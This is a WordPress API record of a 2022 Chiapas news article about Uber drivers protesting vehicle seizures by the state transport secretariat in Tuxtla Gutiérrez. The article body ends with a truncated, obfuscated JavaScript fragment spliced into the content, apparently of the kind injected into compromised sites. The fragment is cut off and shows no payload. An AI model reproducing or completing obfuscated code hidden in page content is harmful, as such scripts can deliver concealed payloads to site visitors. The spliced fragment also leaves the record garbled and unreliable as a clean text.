{"id":1165,"date":"2022-04-08T02:14:33","date_gmt":"2022-04-08T02:14:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1165"},"modified":"2022-04-08T02:15:26","modified_gmt":"2022-04-08T02:15:26","slug":"conductores-de-uber-exige-laborar-en-tuxtl","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1165","title":{"rendered":"Conductores de Uber exige laborar en Tuxtl"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"572\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220407-WA0035-1024x572.jpg\" alt=\"\" class=\"wp-image-1162\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220407-WA0035-1024x572.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220407-WA0035-300x168.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220407-WA0035-768x429.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220407-WA0035.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>Rodolfo Flores.<br>Agencia ReporteCiudadano, 7 de abril de 2022. Tuxtla Guti\u00e9rrez.- Aristeo Acevedo, conductor de Uber en Tuxtla en compa\u00f1\u00eda de decenas de colegas exigi\u00f3 que les den la oportunidad de laborar con libertad en la capital chiapaneca y pidieron un cese a los actos represivos de las autoridades de la Secretar\u00eda de Movilidad y Transporte.<br>Precis\u00f3 que, en Tuxtla Guti\u00e9rrez operan desde hace seis meses cerca de 400 conductores de la aplicaci\u00f3n Uber, este jueves marcharon para pedir un alto al acoso por parte de la Secretar\u00eda de Movilidad y Transportes que encabeza Aquiles Espinosa Garc\u00eda.<br>Detallaron que 15 veh\u00edculos particulares han sido remitidos al corral\u00f3n en medio de operativos que realiza la dependencia estatal, bajo el argumento de que ofrecen un servicio sin concesiones. Sin embargo, cuentan con un amparo para poder realizar operaciones, por ello, calificaron como secuestros de unidades, ya que en estos operativos no se identifican los funcionarios que detienen las unidades ni cuentan con placas de circulaci\u00f3n en los veh\u00edculos supuestamente oficiales.<br>Lamentaron que este tipo de operativos no se realicen en contra del pirataje que ha ido en aumento en Chiapas.<br>Indic\u00f3 que: \u201cEl acoso que se nos viene haciendo hacia nosotros, como trabajadores y prestadores de un servicio particular\u201d.<br>Los conductores expresaron que: \u201cNo somos delincuentes, somos Uber, Aquiles d\u00e9janos trabajar, alto al hostigamiento\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores.Agencia ReporteCiudadano, 7 de abril de 2022. Tuxtla Guti\u00e9rrez.- Aristeo Acevedo, conductor de Uber en Tuxtla en compa\u00f1\u00eda de decenas de colegas exigi\u00f3 que les den la oportunidad de laborar con libertad en la capital chiapaneca y pidieron un cese a los actos represivos de las autoridades de la Secretar\u00eda de Movilidad y Transporte.Precis\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1162,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-1165","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1165","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1165"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1165\/revisions"}],"predecessor-version":[{"id":1166,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1165\/revisions\/1166"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1162"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1165"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1165"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1165"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}